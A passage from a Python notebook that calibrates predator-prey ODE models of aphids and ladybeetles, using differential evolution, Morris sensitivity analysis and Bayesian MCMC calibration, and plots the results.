parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[429]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP2 = LP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP2.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
LP2_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[430]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[431]:
df_sigmai
# In[432]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP2.png", dpi=300)
plt.show()
# In[433]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[434]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def LP2_ode_wrapper(time_exp, r1, r2, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
LP2_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[435]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_LP2:
# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 10 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + 10 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=800, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP2_model",
LP2_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 10 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + 10 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=800, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP2_model",
LP2_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 10 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + 10 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=800, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP2_model",
LP2_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_LP2:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_LP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[436]:
plt.hist(trace_calibration_LP2['r1'], bins=35)
plt.show()
# In[437]:
calibration_variable_names = [
"std_deviation",
"r1",
"a1",
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_LP2[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_LP2.png")
# In[ ]:
az.plot_pair(
trace_calibration_LP2,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP2.png")
# In[ ]:
df_stats_summary = az.summary(
data=trace_calibration_LP2,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_LP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP2.csv") # salvando em um csv para consultas
df_stats_summary
# In[ ]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP2["LP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP2["LP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP2["LP2_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP2.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_LP2.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Logistic Prey Growth FR3 model
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP3_model(
t,
X,
r1 = 1,
r2 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 * u - r2 * u * u - a1 * u * u * v / ( a2 + a3 * u * u )
v_prime = 0
return u_prime, v_prime
def LP3_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=LP3_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def LP3_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
r1=0.0013449982979212053
r2=5.107493312221165e-09
a1=0.29248668073045164
a2=0.00010184919192640282
a3=0.034710039784000675
denom_min = 0.1
denom_max = 1.9
bounds_LP3 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_LP3 = optimize.differential_evolution(
LP3_least_squares_error_ode,
bounds=bounds_LP3,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
LP3_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_LP3)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_LP3.x
solution_ODE_LP3 = LP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_LP3.x
)
t_computed_LP3, y_computed_LP3 = solution_ODE_LP3.t, solution_ODE_LP3.y
u_LP3, v_LP3 = y_computed_LP3
parameters_dict = {
"Model": "LP3",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_LP3, u_LP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_LP3, v_LP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = LP3_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
LP3_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP3 = LP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP3.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[ ]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_LP3,
u_LP3,
v_LP3,
LP3_model,
mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP3, u_LP3, '-x', label='Pest population')
plt.plot(t_computed_LP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP3.png", dpi=300)
plt.show()
# In[ ]:
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP3 = LP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP3.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
LP3_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def LP3_ode_wrapper(time_exp, r1, r2, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, a1, a2, a3]
initial_conditions = np.array([u0, v0])
